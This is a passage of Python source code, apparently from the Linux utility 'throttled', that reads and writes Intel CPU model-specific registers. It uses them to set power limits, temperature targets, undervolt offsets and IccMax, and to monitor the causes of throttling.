(6, 29, 0): 'Dunnington-6C',
(6, 29, 1): 'Dunnington',
(6, 30, 0): 'Lynnfield',
(6, 30, 5): 'Lynnfield_CPUID',
(6, 31, 1): 'Auburndale',
(6, 37, 2): 'Clarkdale',
(6, 38, 1): 'TunnelCreek',
(6, 39, 2): 'Medfield',
(6, 42, 2): 'SandyBridge',
(6, 42, 6): 'SandyBridge',
(6, 42, 7): 'Sandy Bridge-DT',
(6, 44, 1): 'Westmere-EP',
(6, 44, 2): 'Gulftown',
(6, 45, 5): 'Sandy Bridge-EP',
(6, 45, 6): 'Sandy Bridge-E',
(6, 46, 4): 'Beckton',
(6, 46, 5): 'Beckton',
(6, 46, 6): 'Beckton',
(6, 47, 2): 'Eagleton',
(6, 53, 1): 'Cloverview',
(6, 54, 1): 'Cedarview-D',
(6, 54, 9): 'Centerton',
(6, 55, 3): 'Bay Trail-D',
(6, 55, 8): 'Silvermont',
(6, 58, 9): 'Ivy Bridge-DT',
(6, 60, 3): 'Haswell-DT',
(6, 61, 4): 'Broadwell-U',
(6, 62, 3): 'IvyBridgeEP',
(6, 62, 4): 'Ivy Bridge-E',
(6, 63, 2): 'Haswell-EP',
(6, 69, 1): 'HaswellULT',
(6, 70, 1): 'Crystal Well-DT',
(6, 71, 1): 'Broadwell-H',
(6, 76, 3): 'Braswell',
(6, 77, 8): 'Avoton',
(6, 78, 3): 'Skylake',
(6, 79, 1): 'BroadwellE',
(6, 85, 4): 'SkylakeXeon',
(6, 85, 6): 'CascadeLakeSP',
(6, 85, 7): 'CascadeLakeXeon2',
(6, 86, 2): 'BroadwellDE',
(6, 86, 4): 'BroadwellDE',
(6, 87, 0): 'KnightsLanding',
(6, 87, 1): 'KnightsLanding',
(6, 90, 0): 'Moorefield',
(6, 92, 9): 'Apollo Lake',
(6, 93, 1): 'SoFIA',
(6, 94, 0): 'Skylake',
(6, 94, 3): 'Skylake-S',
(6, 95, 1): 'Denverton',
(6, 102, 3): 'Cannon Lake-U',
(6, 117, 10): 'Spreadtrum',
(6, 122, 1): 'Gemini Lake-D',
(6, 122, 8): 'GoldmontPlus',
(6, 126, 5): 'IceLakeY',
(6, 138, 1): 'Lakefield',
(6, 140, 1): 'TigerLake',
(6, 141, 1): 'TigerLake',
(6, 142, 9): 'Kabylake',
(6, 142, 10): 'Kabylake',
(6, 142, 11): 'WhiskeyLake',
(6, 142, 12): 'Comet Lake-U',
(6, 156, 0): 'JasperLake',
(6, 158, 9): 'KabylakeG',
(6, 158, 10): 'Coffeelake',
(6, 158, 11): 'Coffeelake',
(6, 158, 12): 'CoffeeLake',
(6, 158, 13): 'CoffeeLake',
(6, 165, 2): 'CometLake',
(6, 165, 4): 'CometLake',
(6, 165, 5): 'Comet Lake-S',
(6, 166, 0): 'CometLake',
(6, 167, 1): 'RocketLake',
}
TESTMSR = False
UNSUPPORTED_FEATURES = []
class bcolors:
YELLOW = '\033[93m'
GREEN = '\033[92m'
RED = '\033[91m'
RESET = '\033[0m'
BOLD = '\033[1m'
OK = bcolors.GREEN + bcolors.BOLD + 'OK' + bcolors.RESET
ERR = bcolors.RED + bcolors.BOLD + 'ERR' + bcolors.RESET
LIM = bcolors.YELLOW + bcolors.BOLD + 'LIM' + bcolors.RESET
log_history = set()
def log(msg, oneshot=False, end='\n'):
outfile = args.log if args.log else sys.stdout
if msg.strip() not in log_history or oneshot is False:
tstamp = datetime.now().strftime('%Y-%m-%d %H:%M:%S.%f')[:-3]
full_msg = '{:s}: {:s}'.format(tstamp, msg) if args.log else msg
print(full_msg, file=outfile, end=end)
log_history.add(msg.strip())
def fatal(msg, code=1, end='\n'):
outfile = args.log if args.log else sys.stderr
tstamp = datetime.now().strftime('%Y-%m-%d %H:%M:%S.%f')[:-3]
full_msg = '{:s}: [E] {:s}'.format(tstamp, msg) if args.log else '[E] {:s}'.format(msg)
print(full_msg, file=outfile, end=end)
sys.exit(code)
def warning(msg, oneshot=True, end='\n'):
outfile = args.log if args.log else sys.stderr
if msg.strip() not in log_history or oneshot is False:
tstamp = datetime.now().strftime('%Y-%m-%d %H:%M:%S.%f')[:-3]
full_msg = '{:s}: [W] {:s}'.format(tstamp, msg) if args.log else '[W] {:s}'.format(msg)
print(full_msg, file=outfile, end=end)
log_history.add(msg.strip())
def writemsr(msr, val):
msr_list = ['/dev/cpu/{:d}/msr'.format(x) for x in range(cpu_count())]
if not os.path.exists(msr_list[0]):
try:
subprocess.check_call(('modprobe', 'msr'))
except subprocess.CalledProcessError:
fatal('Unable to load the msr module.')
try:
for addr in msr_list:
f = os.open(addr, os.O_WRONLY)
os.lseek(f, MSR_DICT[msr], os.SEEK_SET)
os.write(f, struct.pack('Q', val))
os.close(f)
except (IOError, OSError) as e:
if TESTMSR:
raise e
if e.errno == EPERM or e.errno == EACCES:
fatal(
'Unable to write to MSR {} ({:x}). Try to disable Secure Boot '
'and check if your kernel does not restrict access to MSR.'.format(msr, MSR_DICT[msr])
)
elif e.errno == EIO:
fatal('Unable to write to MSR {} ({:x}). Unknown error.'.format(msr, MSR_DICT[msr]))
else:
raise e
# returns the value between from_bit and to_bit as unsigned long
def readmsr(msr, from_bit=0, to_bit=63, cpu=None, flatten=False):
assert cpu is None or cpu in range(cpu_count())
if from_bit > to_bit:
fatal('Wrong readmsr bit params')
msr_list = ['/dev/cpu/{:d}/msr'.format(x) for x in range(cpu_count())]
if not os.path.exists(msr_list[0]):
try:
subprocess.check_call(('modprobe', 'msr'))
except subprocess.CalledProcessError:
fatal('Unable to load the msr module.')
try:
output = []
for addr in msr_list:
f = os.open(addr, os.O_RDONLY)
os.lseek(f, MSR_DICT[msr], os.SEEK_SET)
val = struct.unpack('Q', os.read(f, 8))[0]
os.close(f)
output.append(get_value_for_bits(val, from_bit, to_bit))
if flatten:
if len(set(output)) > 1:
warning('Found multiple values for {:s} ({:x}). This should never happen.'.format(msr, MSR_DICT[msr]))
return output[0]
return output[cpu] if cpu is not None else output
except (IOError, OSError) as e:
if TESTMSR:
raise e
if e.errno == EPERM or e.errno == EACCES:
fatal('Unable to read from MSR {} ({:x}). Try to disable Secure Boot.'.format(msr, MSR_DICT[msr]))
elif e.errno == EIO:
            fatal('Unable to read from MSR {} ({:x}). Unknown error.'.format(msr, MSR_DICT[msr]))
else:
raise e
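# Example: readmsr('MSR_PLATFORM_INFO', 8, 15, cpu=0) returns the maximum non-turbo
# ratio of CPU 0 (see platform_info_bits above for the bit layout).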
def get_value_for_bits(val, from_bit=0, to_bit=63):
mask = sum(2 ** x for x in range(from_bit, to_bit + 1))
return (val & mask) >> from_bit
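# Example: get_value_for_bits(0b1101100, 2, 5) masks bits 2..5 and shifts them down,
# returning 0b1011 (11).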
def set_msr_allow_writes():
log('[I] Trying to unlock MSR allow_writes.')
if not os.path.exists('/sys/module/msr'):
try:
subprocess.check_call(('modprobe', 'msr'))
except subprocess.CalledProcessError:
return
if os.path.exists('/sys/module/msr/parameters/allow_writes'):
try:
with open('/sys/module/msr/parameters/allow_writes', 'w') as f:
f.write('on')
except:
warning('Unable to set MSR allow_writes to on. You might experience warnings in kernel logs.')
def is_on_battery(config):
try:
for path in glob.glob(config.get('GENERAL', 'Sysfs_Power_Path', fallback=DEFAULT_SYSFS_POWER_PATH)):
with open(path) as f:
return not bool(int(f.read()))
raise
except:
warning('No valid Sysfs_Power_Path found! Trying upower method #1')
try:
out = subprocess.check_output(('upower', '-i', '/org/freedesktop/UPower/devices/line_power_AC'))
res = re.search(rb'online:\s+(yes|no)', out).group(1).decode().strip()
if res == 'yes':
return False
elif res == 'no':
return True
raise
except:
warning('Trying upower method #2')
try:
out = subprocess.check_output(('upower', '-i', '/org/freedesktop/UPower/devices/battery_BAT0'))
res = re.search(rb'state:\s+(.+)', out).group(1).decode().strip()
if res == 'discharging':
return True
elif res in ('fully-charged', 'charging'):
return False
except:
pass
warning('No valid power detection methods found. Assuming that the system is running on battery power.')
return True
def get_cpu_platform_info():
features_msr_value = readmsr('MSR_PLATFORM_INFO', cpu=0)
cpu_platform_info = {}
for key, value in platform_info_bits.items():
cpu_platform_info[key] = int(get_value_for_bits(features_msr_value, value[0], value[1]))
return cpu_platform_info
def get_reset_thermal_status():
# read thermal status
thermal_status_msr_value = readmsr('IA32_THERM_STATUS')
thermal_status = []
for core in range(cpu_count()):
thermal_status_core = {}
for key, value in thermal_status_bits.items():
thermal_status_core[key] = int(get_value_for_bits(thermal_status_msr_value[core], value[0], value[1]))
thermal_status.append(thermal_status_core)
# reset log bits
writemsr('IA32_THERM_STATUS', 0)
return thermal_status
def get_time_unit():
# 0.000977 is the time unit of my CPU
# TODO formula might be different for other CPUs
return 1.0 / 2 ** readmsr('MSR_RAPL_POWER_UNIT', 16, 19, cpu=0)
def get_power_unit():
# 0.125 is the power unit of my CPU
# TODO formula might be different for other CPUs
return 1.0 / 2 ** readmsr('MSR_RAPL_POWER_UNIT', 0, 3, cpu=0)
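# Example: if MSR_RAPL_POWER_UNIT[3:0] reads 3, the power unit is 1 / 2**3 = 0.125 W;
# if MSR_RAPL_POWER_UNIT[19:16] reads 10, the time unit is 1 / 2**10 ~= 0.000977 s
# (matching the values noted in the comments above).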
def get_critical_temp():
# the critical temperature for my CPU is 100 'C
return readmsr('MSR_TEMPERATURE_TARGET', 16, 23, cpu=0)
def get_cur_pkg_power_limits():
value = readmsr('MSR_PKG_POWER_LIMIT', 0, 55, flatten=True)
return {
'PL1': get_value_for_bits(value, 0, 14),
'TW1': get_value_for_bits(value, 17, 23),
'PL2': get_value_for_bits(value, 32, 46),
'TW2': get_value_for_bits(value, 49, 55),
}
def calc_time_window_vars(t):
time_unit = get_time_unit()
for Y in range(2 ** 5):
for Z in range(2 ** 2):
if t <= (2 ** Y) * (1.0 + Z / 4.0) * time_unit:
return (Y, Z)
raise ValueError('Unable to find a good combination!')
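# Example (assuming a time unit of 1/2**10 = 0.000977 s): a 28 s window is encoded as
# calc_time_window_vars(28) == (14, 3), since 2**14 * (1 + 3/4) / 1024 = 28.0 >= 28.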
def calc_undervolt_msr(plane, offset):
"""Return the value to be written in the MSR 150h for setting the given
offset voltage (in mV) to the given voltage plane.
"""
assert offset <= 0
assert plane in VOLTAGE_PLANES
offset = int(round(offset * 1.024))
offset = 0xFFE00000 & ((offset & 0xFFF) << 21)
return 0x8000001100000000 | (VOLTAGE_PLANES[plane] << 40) | offset
def calc_undervolt_mv(msr_value):
"""Return the offset voltage (in mV) from the given raw MSR 150h value."""
offset = (msr_value & 0xFFE00000) >> 21
offset = offset if offset <= 0x400 else -(0x800 - offset)
return int(round(offset / 1.024))
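# Example: calc_undervolt_msr('CORE', -100) rounds -100 mV to -102 units (offset * 1.024),
# packs it into bits 21..31 and yields 0x80000011F3400000; calc_undervolt_mv(0xF3400000)
# decodes the same field back to -100 mV.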
def get_undervolt(plane=None, convert=False):
if 'UNDERVOLT' in UNSUPPORTED_FEATURES:
return 0
planes = [plane] if plane in VOLTAGE_PLANES else VOLTAGE_PLANES
out = {}
for plane in planes:
writemsr('MSR_OC_MAILBOX', 0x8000001000000000 | (VOLTAGE_PLANES[plane] << 40))
read_value = readmsr('MSR_OC_MAILBOX', flatten=True) & 0xFFFFFFFF
out[plane] = calc_undervolt_mv(read_value) if convert else read_value
return out
def undervolt(config):
if ('UNDERVOLT.{:s}'.format(power['source']) not in config and 'UNDERVOLT' not in config) or (
'UNDERVOLT' in UNSUPPORTED_FEATURES
):
return
for plane in VOLTAGE_PLANES:
write_offset_mv = config.getfloat(
'UNDERVOLT.{:s}'.format(power['source']), plane, fallback=config.getfloat('UNDERVOLT', plane, fallback=0.0)
)
write_value = calc_undervolt_msr(plane, write_offset_mv)
writemsr('MSR_OC_MAILBOX', write_value)
if args.debug:
write_value &= 0xFFFFFFFF
read_value = get_undervolt(plane)[plane]
read_offset_mv = calc_undervolt_mv(read_value)
match = OK if write_value == read_value else ERR
log(
'[D] Undervolt plane {:s} - write {:.0f} mV ({:#x}) - read {:.0f} mV ({:#x}) - match {}'.format(
plane, write_offset_mv, write_value, read_offset_mv, read_value, match
)
)
def calc_icc_max_msr(plane, current):
"""Return the value to be written in the MSR 150h for setting the given
IccMax (in A) to the given current plane.
"""
assert 0 < current <= 0x3FF
assert plane in CURRENT_PLANES
current = int(round(current * 4))
return 0x8000001700000000 | (CURRENT_PLANES[plane] << 40) | current
def calc_icc_max_amp(msr_value):
"""Return the max current (in A) from the given raw MSR 150h value."""
return (msr_value & 0x3FF) / 4.0
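# Example: calc_icc_max_msr('CORE', 6) stores 6 A as 24 quarter-amp units and yields
# 0x8000001700000018; calc_icc_max_amp(0x18) converts the raw field back to 6.0 A.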
def get_icc_max(plane=None, convert=False):
planes = [plane] if plane in CURRENT_PLANES else CURRENT_PLANES
out = {}
for plane in planes:
writemsr('MSR_OC_MAILBOX', 0x8000001600000000 | (CURRENT_PLANES[plane] << 40))
read_value = readmsr('MSR_OC_MAILBOX', flatten=True) & 0x3FF
out[plane] = calc_icc_max_amp(read_value) if convert else read_value
return out
def set_icc_max(config):
for plane in CURRENT_PLANES:
try:
write_current_amp = config.getfloat(
'ICCMAX.{:s}'.format(power['source']), plane, fallback=config.getfloat('ICCMAX', plane, fallback=-1.0)
)
if write_current_amp > 0:
write_value = calc_icc_max_msr(plane, write_current_amp)
writemsr('MSR_OC_MAILBOX', write_value)
if args.debug:
write_value &= 0x3FF
read_value = get_icc_max(plane)[plane]
read_current_A = calc_icc_max_amp(read_value)
match = OK if write_value == read_value else ERR
log(
'[D] IccMax plane {:s} - write {:.2f} A ({:#x}) - read {:.2f} A ({:#x}) - match {}'.format(
plane, write_current_amp, write_value, read_current_A, read_value, match
)
)
except (configparser.NoSectionError, configparser.NoOptionError):
pass
def load_config():
config = configparser.ConfigParser()
config.read(args.config)
# config values sanity check
for power_source in ('AC', 'BATTERY'):
for option in ('Update_Rate_s', 'PL1_Tdp_W', 'PL1_Duration_s', 'PL2_Tdp_W', 'PL2_Duration_S'):
value = config.getfloat(power_source, option, fallback=None)
if value is not None:
                config.set(power_source, option, str(max(0.001, value)))
elif option == 'Update_Rate_s':
fatal('The mandatory "Update_Rate_s" parameter is missing.')
trip_temp = config.getfloat(power_source, 'Trip_Temp_C', fallback=None)
if trip_temp is not None:
valid_trip_temp = min(TRIP_TEMP_RANGE[1], max(TRIP_TEMP_RANGE[0], trip_temp))
if trip_temp != valid_trip_temp:
config.set(power_source, 'Trip_Temp_C', str(valid_trip_temp))
log(
'[!] Overriding invalid "Trip_Temp_C" value in "{:s}": {:.1f} -> {:.1f}'.format(
power_source, trip_temp, valid_trip_temp
)
)
# fix any invalid value (ie. > 0) in the undervolt settings
for key in UNDERVOLT_KEYS:
for plane in VOLTAGE_PLANES:
if key in config:
value = config.getfloat(key, plane)
valid_value = min(0, value)
if value != valid_value:
config.set(key, plane, str(valid_value))
log(
'[!] Overriding invalid "{:s}" value in "{:s}" voltage plane: {:.0f} -> {:.0f}'.format(
key, plane, value, valid_value
)
)
# handle the case where only one of UNDERVOLT.AC, UNDERVOLT.BATTERY keys exists
# by forcing the other key to all zeros (ie. no undervolt)
if any(key in config for key in UNDERVOLT_KEYS[1:]):
for key in UNDERVOLT_KEYS[1:]:
if key not in config:
config.add_section(key)
for plane in VOLTAGE_PLANES:
value = config.getfloat(key, plane, fallback=0.0)
config.set(key, plane, str(value))
# Check for CORE/CACHE values mismatch
for key in UNDERVOLT_KEYS:
if key in config:
if config.getfloat(key, 'CORE', fallback=0) != config.getfloat(key, 'CACHE', fallback=0):
warning('On Skylake and newer CPUs CORE and CACHE values should match!')
break
iccmax_enabled = False
# check for invalid values (ie. <= 0 or > 0x3FF) in the IccMax settings
for key in ICCMAX_KEYS:
for plane in CURRENT_PLANES:
if key in config:
try:
value = config.getfloat(key, plane)
if value <= 0 or value >= 0x3FF:
raise ValueError
iccmax_enabled = True
except ValueError:
warning('Invalid value for {:s} in {:s}'.format(plane, key), oneshot=False)
config.remove_option(key, plane)
except configparser.NoOptionError:
pass
if iccmax_enabled:
warning('Warning! Raising IccMax above design limits can damage your system!')
return config
def calc_reg_values(platform_info, config):
regs = defaultdict(dict)
for power_source in ('AC', 'BATTERY'):
if platform_info['feature_programmable_temperature_target'] != 1:
warning("Setting temperature target is not supported by this CPU")
else:
# the critical temperature for my CPU is 100 'C
critical_temp = get_critical_temp()
# update the allowed temp range to keep at least 3 'C from the CPU critical temperature
global TRIP_TEMP_RANGE
TRIP_TEMP_RANGE[1] = min(TRIP_TEMP_RANGE[1], critical_temp - 3)
Trip_Temp_C = config.getfloat(power_source, 'Trip_Temp_C', fallback=None)
if Trip_Temp_C is not None:
trip_offset = int(round(critical_temp - Trip_Temp_C))
regs[power_source]['MSR_TEMPERATURE_TARGET'] = trip_offset << 24
else:
log('[I] {:s} trip temperature is disabled in config.'.format(power_source))
power_unit = get_power_unit()
PL1_Tdp_W = config.getfloat(power_source, 'PL1_Tdp_W', fallback=None)
PL1_Duration_s = config.getfloat(power_source, 'PL1_Duration_s', fallback=None)
PL2_Tdp_W = config.getfloat(power_source, 'PL2_Tdp_W', fallback=None)
PL2_Duration_s = config.getfloat(power_source, 'PL2_Duration_s', fallback=None)
if (PL1_Tdp_W, PL1_Duration_s, PL2_Tdp_W, PL2_Duration_s).count(None) < 4:
cur_pkg_power_limits = get_cur_pkg_power_limits()
if PL1_Tdp_W is None:
PL1 = cur_pkg_power_limits['PL1']
log('[I] {:s} PL1_Tdp_W disabled in config.'.format(power_source))
else:
PL1 = int(round(PL1_Tdp_W / power_unit))
if PL1_Duration_s is None:
TW1 = cur_pkg_power_limits['TW1']
log('[I] {:s} PL1_Duration_s disabled in config.'.format(power_source))
else:
Y, Z = calc_time_window_vars(PL1_Duration_s)
TW1 = Y | (Z << 5)
if PL2_Tdp_W is None:
PL2 = cur_pkg_power_limits['PL2']
log('[I] {:s} PL2_Tdp_W disabled in config.'.format(power_source))
else:
PL2 = int(round(PL2_Tdp_W / power_unit))
if PL2_Duration_s is None:
TW2 = cur_pkg_power_limits['TW2']
log('[I] {:s} PL2_Duration_s disabled in config.'.format(power_source))
else:
Y, Z = calc_time_window_vars(PL2_Duration_s)
TW2 = Y | (Z << 5)
regs[power_source]['MSR_PKG_POWER_LIMIT'] = (
PL1 | (1 << 15) | (1 << 16) | (TW1 << 17) | (PL2 << 32) | (1 << 47) | (TW2 << 49)
)
else:
log('[I] {:s} package power limits are disabled in config.'.format(power_source))
# cTDP
c_tdp_target_value = config.getint(power_source, 'cTDP', fallback=None)
if c_tdp_target_value is not None:
if platform_info['feature_programmable_tdp_limit'] != 1:
log("[W] cTDP setting not supported by this CPU")
elif platform_info['number_of_additional_tdp_profiles'] < c_tdp_target_value:
log("[W] the configured cTDP profile is not supported by this CPU")
else:
valid_c_tdp_target_value = max(0, c_tdp_target_value)
regs[power_source]['MSR_CONFIG_TDP_CONTROL'] = valid_c_tdp_target_value
return regs
def set_hwp(performance_mode):
if performance_mode not in (True, False) or 'HWP' in UNSUPPORTED_FEATURES:
return
# set HWP energy performance preference
cur_val = readmsr('IA32_HWP_REQUEST', cpu=0)
hwp_mode = HWP_PERFORMANCE_VALUE if performance_mode is True else HWP_DEFAULT_VALUE
new_val = (cur_val & 0xFFFFFFFF00FFFFFF) | (hwp_mode << 24)
writemsr('IA32_HWP_REQUEST', new_val)
if args.debug:
read_value = readmsr('IA32_HWP_REQUEST', from_bit=24, to_bit=31)[0]
match = OK if hwp_mode == read_value else ERR
log('[D] HWP - write "{:#02x}" - read "{:#02x}" - match {}'.format(hwp_mode, read_value, match))
def set_disable_bdprochot():
# Disable BDPROCHOT
cur_val = readmsr('MSR_POWER_CTL', flatten=True)
new_val = cur_val & 0xFFFFFFFFFFFFFFFE
writemsr('MSR_POWER_CTL', new_val)
if args.debug:
read_value = readmsr('MSR_POWER_CTL', from_bit=0, to_bit=0)[0]
        match = OK if read_value == 0 else ERR
log('[D] BDPROCHOT - write "{:#02x}" - read "{:#02x}" - match {}'.format(0, read_value, match))
def get_config_write_time():
try:
return os.stat(args.config).st_mtime
except FileNotFoundError:
return None
def reload_config():
config = load_config()
regs = calc_reg_values(get_cpu_platform_info(), config)
undervolt(config)
set_icc_max(config)
set_hwp(config.getboolean('AC', 'HWP_Mode', fallback=None))
log('[I] Reloading changes.')
return config, regs
def power_thread(config, regs, exit_event):
try:
mchbar_mmio = MMIO(0xFED159A0, 8)
except MMIOError:
warning('Unable to open /dev/mem. TDP override might not work correctly.')
warning('Try to disable Secure Boot and/or enable CONFIG_DEVMEM in kernel config.')
mchbar_mmio = None
next_hwp_write = 0
last_config_write_time = (
get_config_write_time() if config.getboolean('GENERAL', 'Autoreload', fallback=False) else None
)
while not exit_event.is_set():
# log thermal status
if args.debug:
thermal_status = get_reset_thermal_status()
for index, core_thermal_status in enumerate(thermal_status):
for key, value in core_thermal_status.items():
log('[D] core {} thermal status: {} = {}'.format(index, key.replace("_", " "), value))
# Reload config on changes (unless it's deleted)
if config.getboolean('GENERAL', 'Autoreload', fallback=False):
config_write_time = get_config_write_time()
if config_write_time and last_config_write_time != config_write_time:
last_config_write_time = config_write_time
config, regs = reload_config()
# switch back to sysfs polling
if power['method'] == 'polling':
power['source'] = 'BATTERY' if is_on_battery(config) else 'AC'
# set temperature trip point
if 'MSR_TEMPERATURE_TARGET' in regs[power['source']]:
write_value = regs[power['source']]['MSR_TEMPERATURE_TARGET']
writemsr('MSR_TEMPERATURE_TARGET', write_value)
if args.debug:
read_value = readmsr('MSR_TEMPERATURE_TARGET', 24, 29, flatten=True)
match = OK if write_value >> 24 == read_value else ERR
log(
'[D] TEMPERATURE_TARGET - write {:#x} - read {:#x} - match {}'.format(
write_value >> 24, read_value, match
)
)
# set cTDP
if 'MSR_CONFIG_TDP_CONTROL' in regs[power['source']]:
write_value = regs[power['source']]['MSR_CONFIG_TDP_CONTROL']
writemsr('MSR_CONFIG_TDP_CONTROL', write_value)
if args.debug:
read_value = readmsr('MSR_CONFIG_TDP_CONTROL', 0, 1, flatten=True)
match = OK if write_value == read_value else ERR
log(
'[D] CONFIG_TDP_CONTROL - write {:#x} - read {:#x} - match {}'.format(
write_value, read_value, match
)
)
# set PL1/2 on MSR
write_value = regs[power['source']]['MSR_PKG_POWER_LIMIT']
writemsr('MSR_PKG_POWER_LIMIT', write_value)
if args.debug:
read_value = readmsr('MSR_PKG_POWER_LIMIT', 0, 55, flatten=True)
match = OK if write_value == read_value else ERR
log(
'[D] MSR PACKAGE_POWER_LIMIT - write {:#x} - read {:#x} - match {}'.format(
write_value, read_value, match
)
)
if mchbar_mmio is not None:
# set MCHBAR register to the same PL1/2 values
mchbar_mmio.write32(0, write_value & 0xFFFFFFFF)
mchbar_mmio.write32(4, write_value >> 32)
if args.debug:
read_value = mchbar_mmio.read32(0) | (mchbar_mmio.read32(4) << 32)
match = OK if write_value == read_value else ERR
log(
'[D] MCHBAR PACKAGE_POWER_LIMIT - write {:#x} - read {:#x} - match {}'.format(
write_value, read_value, match
)
)
# Disable BDPROCHOT
disable_bdprochot = config.getboolean(power['source'], 'Disable_BDPROCHOT', fallback=None)
if disable_bdprochot:
set_disable_bdprochot()
wait_t = config.getfloat(power['source'], 'Update_Rate_s')
enable_hwp_mode = config.getboolean('AC', 'HWP_Mode', fallback=None)
# set HWP less frequently. Just to be safe since (e.g.) TLP might reset this value
if (
enable_hwp_mode
and next_hwp_write <= time()
and (
(power['method'] == 'dbus' and power['source'] == 'AC')
or (power['method'] == 'polling' and not is_on_battery(config))
)
):
set_hwp(enable_hwp_mode)
next_hwp_write = time() + HWP_INTERVAL
        exit_event.wait(wait_t)
def check_kernel():
if os.geteuid() != 0:
fatal('No root no party. Try again with sudo.')
kernel_config = None
try:
with open(os.path.join('/boot', 'config-{:s}'.format(uname()[2]))) as f:
kernel_config = f.read()
except IOError:
config_gz_path = os.path.join('/proc', 'config.gz')
try:
if not os.path.isfile(config_gz_path):
subprocess.check_call(('modprobe', 'configs'))
with gzip.open(config_gz_path) as f:
kernel_config = f.read().decode()
except (subprocess.CalledProcessError, IOError):
pass
if kernel_config is None:
log('[W] Unable to obtain and validate kernel config.')
return
elif not re.search('CONFIG_DEVMEM=y', kernel_config):
warning('Bad kernel config: you need CONFIG_DEVMEM=y.')
if not re.search('CONFIG_X86_MSR=(y|m)', kernel_config):
fatal('Bad kernel config: you need CONFIG_X86_MSR builtin or as module.')
def check_cpu():
try:
with open('/proc/cpuinfo') as f:
cpuinfo = {}
for row in f.readlines():
try:
key, value = map(lambda x: x.strip(), row.split(':'))
if key == 'processor' and value == '1':
break
try:
cpuinfo[key] = int(value, 0)
except ValueError:
cpuinfo[key] = value
except ValueError:
pass
if cpuinfo['vendor_id'] != 'GenuineIntel':
fatal('This tool is designed for Intel CPUs only.')
cpuid = (cpuinfo['cpu family'], cpuinfo['model'], cpuinfo['stepping'])
if cpuid not in supported_cpus:
fatal(
'Your CPU model is not supported.\n\n'
'Please open a new issue (https://github.com/erpalma/throttled/issues) specifying:\n'
' - model name\n'
' - cpu family\n'
' - model\n'
' - stepping\n'
'from /proc/cpuinfo.'
)
log('[I] Detected CPU architecture: Intel {:s}'.format(supported_cpus[cpuid]))
except SystemExit:
sys.exit(1)
except:
fatal('Unable to identify CPU model.')
def test_msr_rw_capabilities():
    global TESTMSR
    TESTMSR = True
try:
log('[I] Testing if undervolt is supported...')
get_undervolt()
except:
warning('Undervolt seems not to be supported by your system, disabling.')
UNSUPPORTED_FEATURES.append('UNDERVOLT')
try:
log('[I] Testing if HWP is supported...')
cur_val = readmsr('IA32_HWP_REQUEST', cpu=0)
writemsr('IA32_HWP_REQUEST', cur_val)
except:
warning('HWP seems not to be supported by your system, disabling.')
UNSUPPORTED_FEATURES.append('HWP')
TESTMSR = False
def monitor(exit_event, wait):
wait = max(0.1, wait)
rapl_power_unit = 0.5 ** readmsr('MSR_RAPL_POWER_UNIT', from_bit=8, to_bit=12, cpu=0)
power_plane_msr = {
'Package': 'MSR_INTEL_PKG_ENERGY_STATUS',
'Graphics': 'MSR_PP1_ENERGY_STATUS',
'DRAM': 'MSR_DRAM_ENERGY_STATUS',
}
prev_energy = {
'Package': (readmsr('MSR_INTEL_PKG_ENERGY_STATUS', cpu=0) * rapl_power_unit, time()),
'Graphics': (readmsr('MSR_PP1_ENERGY_STATUS', cpu=0) * rapl_power_unit, time()),
'DRAM': (readmsr('MSR_DRAM_ENERGY_STATUS', cpu=0) * rapl_power_unit, time()),
}
undervolt_values = get_undervolt(convert=True)
undervolt_output = ' | '.join('{:s}: {:.2f} mV'.format(plane, undervolt_values[plane]) for plane in VOLTAGE_PLANES)
log('[D] Undervolt offsets: {:s}'.format(undervolt_output))
iccmax_values = get_icc_max(convert=True)
iccmax_output = ' | '.join('{:s}: {:.2f} A'.format(plane, iccmax_values[plane]) for plane in CURRENT_PLANES)
log('[D] IccMax: {:s}'.format(iccmax_output))
log('[D] Realtime monitoring of throttling causes:\n')
while not exit_event.is_set():
value = readmsr('IA32_THERM_STATUS', from_bit=0, to_bit=15, cpu=0)
offsets = {'Thermal': 0, 'Power': 10, 'Current': 12, 'Cross-domain (e.g. GPU)': 14}
output = ('{:s}: {:s}'.format(cause, LIM if bool((value >> offsets[cause]) & 1) else OK) for cause in offsets)
# ugly code, just testing...
vcore = readmsr('IA32_PERF_STATUS', from_bit=32, to_bit=47, cpu=0) / (2.0 ** 13) * 1000
stats2 = {'VCore': '{:.0f} mV'.format(vcore)}
total = 0.0
for power_plane in ('Package', 'Graphics', 'DRAM'):
energy_j = readmsr(power_plane_msr[power_plane], cpu=0) * rapl_power_unit
now = time()
prev_energy[power_plane], energy_w = (
(energy_j, now),
(energy_j - prev_energy[power_plane][0]) / (now - prev_energy[power_plane][1]),
)
stats2[power_plane] = '{:.1f} W'.format(energy_w)
total += energy_w
stats2['Total'] = '{:.1f} W'.format(total)
output2 = ('{:s}: {:s}'.format(label, stats2[label]) for label in stats2)
terminator = '\n' if args.log else '\r'
log(
'[{}] {} || {}{}'.format(power['source'], ' - '.join(output), ' - '.join(output2), ' ' * 10),
end=terminator,
)
exit_event.wait(wait)
def main():
global args
parser = argparse.ArgumentParser()
exclusive_group = parser.add_mutually_exclusive_group()
exclusive_group.add_argument('--debug', action='store_true', help='add some debug info and additional checks')
exclusive_group.add_argument(
'--monitor',
metavar='update_rate',
const=1.0,
type=float,
nargs='?',
help='realtime monitoring of throttling causes (default 1s)',
)
parser.add_argument('--config', default='/etc/throttled.conf', help='override default config file path')
parser.add_argument('--force', action='store_true', help='bypass compatibility checks (EXPERTS only)')
parser.add_argument('--log', metavar='/path/to/file', help='log to file instead of stdout')
args = parser.parse_args()
if args.log:
try:
args.log = open(args.log, 'w')
except:
args.log = None
fatal('Unable to write to the log file!')
if not args.force:
check_kernel()
check_cpu()
set_msr_allow_writes()
test_msr_rw_capabilities()
log('[I] Loading config file.')
config = load_config()
power['source'] = 'BATTERY' if is_on_battery(config) else 'AC'
platform_info = get_cpu_platform_info()
if args.debug:
for key, value in platform_info.items():
log('[D] cpu platform info: {} = {}'.format(key.replace("_", " "), value))
regs = calc_reg_values(platform_info, config)
if not config.getboolean('GENERAL', 'Enabled'):
log('[I] Throttled is disabled in config file... Quitting. :(')
return
undervolt(config)
set_icc_max(config)
set_hwp(config.getboolean('AC', 'HWP_Mode', fallback=None))
exit_event = Event()
thread = Thread(target=power_thread, args=(config, regs, exit_event))
thread.daemon = True
thread.start()
# handle dbus events for applying undervolt/IccMax on resume from sleep/hibernate
def handle_sleep_callback(sleeping):
if not sleeping:
undervolt(config)
set_icc_max(config)
def handle_ac_callback(*args):
try:
power['source'] = 'BATTERY' if args[1]['Online'] == 0 else 'AC'
power['method'] = 'dbus'
except:
power['method'] = 'polling'
DBusGMainLoop(set_as_default=True)
